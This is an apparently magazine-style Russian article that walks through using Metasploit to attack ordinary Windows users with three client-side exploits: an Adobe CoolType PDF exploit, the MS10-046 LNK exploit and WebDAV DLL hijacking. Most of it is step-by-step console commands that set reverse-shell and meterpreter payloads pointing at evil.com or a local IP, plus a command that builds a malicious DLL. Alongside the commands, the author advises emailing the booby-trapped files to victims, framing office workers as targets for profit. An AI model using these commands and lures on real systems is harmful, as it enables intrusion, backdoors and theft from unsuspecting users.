Компьютеры
теперь везде и вся. Несчастных
юзеров полным-полно. Почему
несчастных? Да потому что во
многом они стали основной целью
для "хакерских атак" :).
Особенно с развитием всяких
систем переводов, интернет-банкинга и других видов
электронных денег. Теперь снять
профит с обычного юзера – не
проблема. И это уже не считая
классики типа спама, ботнетов,
DoS’ов, кражи конфиденциально
информации. Антивирусы, фаеры,
IDS’ы, системы обновления ПО,
сэндбоксы спасают только
небольшую толпу продвинутых
юзеров/фирм, так как их надо и
настроить, и правильно
реагировать на угрозы, и купить
само ПО. В итоге имеем широкий
выбор из миллионов
менеджеров/бухгалтеров для
"работы" с ними :).
А тут еще
и реально критические уязвимости
от таких контор, как Microsoft и
Adobe, чье ПО является де-факто
стандартом по миру. Да, в этом
смысле лето было богатым!
В качестве примера я приведу три
сплоита: Adobe Acrobat PDF
Cooltype Sing (версии
<=9.3.4/8.2.4), MS DLL
Hijacking, MS LNK
сплоит(MS10-046). Описание
подробностей сплоитов ты можешь
прочитать в "Обзоре эксплойтов"
от Алексея Синцова в этом и в
прошлом номерах.
Как ни странно, все примеры
реализованы с помощью Metasploit
Framework. Тут надо отдать
должное создателям MSF – они
чрезвычайно быстро стали
добавлять сплоиты к самым
массовым критическим
уязвимостям. Некоторые
реализации уязвимостей и вовсе
появляются сразу в MSF, без
сторонних PoC’ов. Все три
перечисленные уязвимости были
0-day, когда попали в MSF.
Сейчас уже есть кое-какие патчи,
но вернемся к делу.
1) Adobe
Acrobat PDF Cooltype Sing. Adobe
этим летом дал миру несколько
суровых дыр. Это одна из них.
Заходим в msfconsole и:
Выбираем сплоит:
msf >
use
exploit/windows/fileformat/adobe_cooltype_sing
Задаем имя файла:
msf >
set
FILENAME xakep_ubileinyi_vypusk.pdf
Куда сохраняем? В home:
msf >
set
OUTPUTPATH ~
Выбираем нагрузку и ее
настройки:
msf >
set
PAYLOAD
windows/shell/reverse_tcp
msf > set
LHOST evil.com
msf > set
LPORT 80
Теперь на наш evil.com вешаем
netcat, например, и посылаем
жертве файлик по почте. Простой
реверсовый шелл нужен,
во-первых, чтобы обойти NAT,
файер, а во-вторых, чтобы не
привязываться к процессу (чтобы
соединение не оборвалось при
закрытии Acrobat Reader’а).
Есть аналогичный сплоит, но
проводящий атаку через браузер и
Adobe’овский плагин к нему –
exploit/windows/browser/adobe_cooltype_sing.
2) MS LNK
сплоит (MS10-046). Сплоит из
разряда фич 🙂
Выбираем сплоит:
msf >use
windows/browser/ms10_046_shortcut_icon_dllloader
Настраиваем пэйлоад:
msf >set
PAYLOAD
windows/meterpreter/reverse_tcp
msf >set
LHOST
192.168.0.101
По сути, сплоит поднимает
WebDAV и кидает туда ярлыки. В
результате либо даем бедному
пользователю полученную ссылку,
либо делаем ярлычок на ресурс.
То есть сплоит из локального
стал удаленным (через шару и
WebDAV). Павним бедного юзера –
ему вряд ли что-то поможет :).
Злую DLL’ку для этого и
следующего сплоита можно создать
и ручками. Ярлычок, понятное
дело, тоже.
$msfpayload
windows/meterpreter/reverse_tcp
LHOST=192.168.0.101
D > evil.dll
Где
-
windows/meterpreter/reverse_tcp
– название нагрузки, - LHOST=192.168.0.101 –
настройки - D – указываем, что
создаем DLL’ку; - evil.dll – имя итогового
файла.
3) MS DLL
Hijacking
Это очень забавная вещь! С ее
помощью мы фактически можем
"превратить" любой миролюбивый
формат файла во что-то злое.
Пришлют тебе файлы с
какой-нибудь презентацией или
чертежами AutoCAD’а, например. А
среди них какая-то библиотечка
валяется. Бывает ведь. Ты,
конечно же, запустишь сам
чертеж, а тут – бац! – и у тебя
бэкдор. Хорошее дело!
Подробное описание "почему и
зачем так" смотри на следующей
странице у Алексея Синцова :).
А теперь – немного практики.
Выбираем сплоит:
msf >
use
windows/browser/webdav_dll_hijacker
Задаем имя файлов:
msf >
set
BASENAME policy
Задаем расширение файла:
msf >
set
EXTENSIONS ppt
Имя для шары:
msf >
set
SHARENAME docs
Нагрузка:
msf >
set
PAYLOAD windows/meterpreter/bind_tcp
После этого либо впариваем
жертве ссылку на шару –
\\192.168.0.101\docs\, либо на
HTTP-сервак – http://192.168.0.101:80.
Жертва открывает файлик – мы
получаем шелл. Честный обмен :).
Опять же, по сути, локальная
уязвимость превратилась в
удаленную за счет шары и WebDAV.
Вот такими тремя client-site
багами мы можем положить на
лопатки все версии Windows, от
XP до 7. Антивири и файеры –
тоже не помеха при небольших
доработках методов :).
